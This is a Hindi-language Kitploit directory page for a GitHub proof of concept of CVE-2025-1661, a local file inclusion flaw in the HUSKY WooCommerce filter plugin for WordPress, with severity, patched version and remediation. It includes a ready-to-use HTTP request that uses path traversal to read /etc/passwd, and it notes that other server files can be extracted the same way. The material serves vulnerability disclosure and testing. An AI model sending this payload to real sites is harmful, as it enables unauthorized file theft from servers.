Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1661 — HUSKY – Products Filter Professional for WooCommerce प्लगइन WordPress के लिए Local File Inclusion (LFI) के प्रति संवेदनशील है | Kitploit
उपकरण/GitHubGitHub/shahwarshah/cve-2025-1661
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshahwarshah/cve-2025-1661

CVE-2025-1661

HUSKY – Products Filter Professional for WooCommerce प्लगइन WordPress के लिए Local File Inclusion (LFI) के प्रति संवेदनशील है

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-1661 - अनधिकृत स्थानीय फ़ाइल समावेशन (LFI) HUSKY – WooCommerce के लिए प्रोडक्ट्स फ़िल्टर प्रोफेशनल में

विवरण

WordPress के लिए HUSKY – Products Filter Professional for WooCommerce प्लगइन 1.3.6.5 तक के सभी संस्करणों में woof_text_search AJAX एक्शन के template पैरामीटर के माध्यम से स्थानीय फ़ाइल समावेशन (LFI) के लिए संवेदनशील है।

यह अनधिकृत हमलावरों को सर्वर पर मनमानी फ़ाइलों को शामिल करने और निष्पादित करने की अनुमति देता है, जिससे संभावित रूप से निम्नलिखित हो सकता है:

  • पहुँच नियंत्रणों को दरकिनार करना
  • संवेदनशील डेटा निकालना
  • दूरस्थ कोड निष्पादन (RCE) यदि कुछ शर्तें पूरी होती हैं (उदा., "सुरक्षित" फ़ाइल प्रकारों का अपलोड)

गंभीरता: गंभीर

  • CVSS स्कोर: 9.8 (गंभीर)
  • CWE आईडी: CWE-22 (पथ ट्रैवर्सल)
  • EPS स्कोर: 0.00061

प्रभावित संस्करण

  • संवेदनशील: <= 1.3.6.5
  • पैच किया गया संस्करण: 1.3.6.6

उपचार

संस्करण 1.3.6.6 या उससे नए पैच किए गए संस्करण में अपडेट करें।


प्रमाण की अवधारणा (PoC)

पुनरुत्पादन के चरण

  1. लक्ष्य वेबसाइट पर जाएँ।
  2. Burp Suite का उपयोग करके अनुरोध कैप्चर करें।
  3. अनुरोध विधि को POST में बदलें और निम्नलिखित पेलोड जोड़ें:
root@kitploit:~
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

action=woof_text_search&

IntercomVulnChecker Screenshot 4. सफल होने पर, सर्वर /etc/passwd की सामग्री लौटाएगा। 5. इसका उपयोग सर्वर से अन्य संवेदनशील फ़ाइलों को निकालने के लिए किया जा सकता है।


संदर्भ

  • Wordfence सलाह
  • WordPress प्लगइन कोड
  • CVE रिपोर्ट

अस्वीकरण

यह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत परीक्षण अवैध और अनैतिक है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा स्पष्ट प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें